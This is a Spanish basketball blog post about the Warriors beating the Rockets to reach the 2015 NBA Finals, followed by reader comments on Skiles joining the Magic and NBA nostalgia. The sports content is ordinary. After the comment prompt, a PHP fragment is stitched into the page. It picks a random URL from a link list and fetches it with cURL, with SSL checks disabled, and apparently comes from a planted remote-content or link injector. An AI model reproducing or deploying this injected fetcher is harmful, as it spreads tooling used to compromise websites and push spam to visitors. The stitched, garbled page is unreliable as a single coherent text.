La Crónica: Victoria en el barro

28 de May de 2015 por txusma

Posiblemente James Harden no haya dormido esta noche. Habrá repasado una y otra vez cada una de las ¡13 pérdidas! que cometió anoche, cada uno de los 9 lanzamientos errados de 11 intentos, incluso los 3 tiros libres que falló. Aún le quitará más el sueño saber que a pesar de su desastrosa actuación los Rockets se mantuvieron en el partido hasta el último cuarto. ¿Hubieran ganado con él a un nivel simplemente correcto? Nunca lo sabremos.

La cuestión es que 40 años después los Warriors vuelven a las finales y lo hacen además como favoritos. Tiempo habrá de analizar lo que nos espera ya que se nos presenta una semana sin baloncesto producto de unas finales de conferencia más desiguales que nunca. Anoche los Warriors volvieron a salir algo dormidos lo que permitió a los Rockets llegar a acumular una ventaja de hasta 8 puntos a pesar de que se veía que James Harden no iba a tener su noche. Pero en el segundo cuarto los “Splash Brothers” se activaron y le dieron la vuelta al marcador, 13 puntos de Klay Thompson y 7 de Stephen Curry que no encontraron mucha respuesta más allá del tiro exterior de Josh Smith (¿quién me iba a decir a mí que escribiría esto hace 3 meses?). 

Tras la reanudación , todo seguía la misma tónica hasta que Trevor Ariza propinó un fuerte rodillazo a la cabeza de Klay Thompson al intentar taponar un lanzamiento. Con el recuerdo de la caída de Stephen Curry aún fresco en la mente de los aficionados, los asistentes no pudieron sinó asustarse al comprobar que el escolta de los Warriors empezaba a sangrar por el oído. Se retiró a los vestuarios y pudo volver en el último cuarto pero acabó abandonando el partido al comenzar a encontrarse algo indispuesto. Los Rockets aprovecharon la confusión posterior para conseguir un parcial de 10-0 y ponerse a un solo punto momento en que los Warrios decidieron bajar al barro y pelear. Demostraron que no son solo un equipo de triples y juego rápido y vistoso sinó que cuando no entran las canastas (como no lo estaban haciendo hasta el momento) se pueden arremangar, plantar una enorme defensa y pelear cada rebote ofensivo como si fuera el último de sus vidas. En el último cuarto, Andre Iguodala acabó de anular a Harden y aparecieron dos secundarios para apuntillar a unos Rockets que a pesar de todo nunca dieron su brazo a torcer: Harrison Barnes anotó 13 puntos en el último periodo y, atención, Festus Ezeli 6, mientras David Lee se lo miraba todo desde el banquillo (ayer sólo jugó 18 segundos).  Un parcial de 11-2 al principio del cuarto inclinó definitivamente la balanza. Los visitantes, sin nadie que los guiara, ya no tuvieron fuerzas para meterse de nuevo en el partido.

Las finales están serviddas, unas finales que enfrentarán a los 2 mejores jugadores del curso. Lamentablemente tendremos que esperar una semana para que den comienzo. La espera se hará larga.

Comenta

7 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Las 13 pérdidas de Harden son récord en un partido de PO,dejando atrás las 11 de John Williamson en 1979 ante los 76ers.Dejado el dato que salió durante la retransmisión,vaya finalísima.Favoritismo para los Warriors,pero tienen esas lagunas de no estar al 100% que Cleveland tiene que aprovechar.A ver LeBron como lidia con la pléyade de defensores de GSW.

      Citar

  2. Triceratops dice:
    #2

    Thibodeau despedido en los Bulls, y esto va a paralizar operaciones paralelas como la de Skiles por los Magic.

      Citar

  3. Triceratops dice:
    #3

    Triceratops:
    Thibodeau despedido en los Bulls, y esto va a paralizar operaciones paralelas como la de Skiles por los Magic.

    Ya es Oficial, Skiles a los Magic por 4 años

      Citar

  4. Jose Luis dice:
    #4

    Triceratops: Ya es Oficial, Skiles a los Magic por 4 años

    y tu opinión? 😛

      Citar

  5. Triceratops dice:
    #5

    Jose Luis: y tu opinión?

    No tiene mal curriculum, aunque tampoco está en la élite de entrenadores. Prefiero guardarme la opinión y juzgarlo una vez lo vea en acción, no obstante, más malo que Jacque Vaughn es imposible.
    Un punto a favor que va a tener es que tiene el listón tan bajo , que a poco que el equipo se acerque de verdad a playoffs y desarrolle a los jugadores, será ya un aprobado.

    Tengo ganas de ver que va a hacer con Moe Harkless (si se mantiene en el equipo). A mi me parece un jugadorazo por explotar, y a ver si Skiles ve en él el mismo potencial que yo, y le da cancha y confianza.

      Citar

  6. Jose Luis dice:
    #6

    Triceratops: No tiene mal curriculum, aunque tampoco está en la élite de entrenadores. Prefiero guardarme la opinión y juzgarlo una vez lo vea en acción, no obstante, más malo que Jacque Vaughn es imposible.
    Un punto a favor que va a tener es que tiene el listón tan bajo , que a poco que el equipo se acerque de verdad a playoffs y desarrolle a los jugadores, será ya un aprobado.

    Tengo ganas de ver que va a hacer con Moe Harkless (si se mantiene en el equipo). A mi me parece un jugadorazo por explotar, y a ver si Skiles ve en él el mismo potencial que yo, y le da cancha y confianza.

    Hombre con estos jugadores y este entrenador, la defensa de Orlando debería ser de las mejores de la liga.

    En ataque les sigue faltando un anotador como bien dices… veremos que pasa.

      Citar

  7. Jose Luis dice:
    #7

    Estaba viendo resúmenes de los Play-offs de 2009, que fue el año que me enganché a la NBA. En 2008 escuché el último partido por radio marca creo, lo vi en el as y dije venga vamos a ver como es esto… no le daban palos a Radmanovic xDDDD

    total que 2009 fue el primer año que viví al completo la nba, y la verdad es que por equipos como Orlando, Denver, esos Cavs de equipación azul oscura o aquellos Lakers, me enganché a esta liga.

    Nada, que me ha entrado nostalgia y quería comentarlo 😀

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>